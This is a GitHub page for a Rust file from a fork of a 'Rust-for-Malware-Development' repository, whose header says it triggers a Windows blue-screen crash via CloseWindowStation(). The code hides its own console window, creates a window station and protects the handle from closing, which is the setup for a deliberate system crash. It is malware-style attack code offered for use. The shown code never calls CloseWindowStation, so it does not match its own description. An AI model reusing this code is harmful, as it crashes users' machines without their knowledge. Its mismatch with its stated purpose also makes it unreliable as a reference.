forked from Whitecat18/Rust-for-Malware-Development
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCloseWindowStation.rs
42 lines (36 loc) · 983 Bytes
/
CloseWindowStation.rs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
/*
Trigger BSOD Using CloseWindowStation()
@5mukx
*/
use std::ptr::null_mut;
use winapi::{
ctypes::c_void,
shared::{
minwindef::HWINSTA,
windef::HWND},
um::{
handleapi::SetHandleInformation,
minwinbase::SECURITY_ATTRIBUTES,
winbase::HANDLE_FLAG_PROTECT_FROM_CLOSE,
wincon::GetConsoleWindow,
winuser::{CreateWindowStationA, ShowWindow, SW_HIDE}
}
};
fn main(){
unsafe{
let hwnd: HWND = GetConsoleWindow();
ShowWindow(hwnd, SW_HIDE);
let dwaddr: u32 = 0x80000000 | 0x40000000;
let hwinsta:HWINSTA = CreateWindowStationA(
"WindowStation\0".as_ptr() as *const i8,
0,
dwaddr,
null_mut() as *mut SECURITY_ATTRIBUTES,
);
SetHandleInformation(
hwinsta as *mut c_void,
HANDLE_FLAG_PROTECT_FROM_CLOSE,
HANDLE_FLAG_PROTECT_FROM_CLOSE,
);
}
}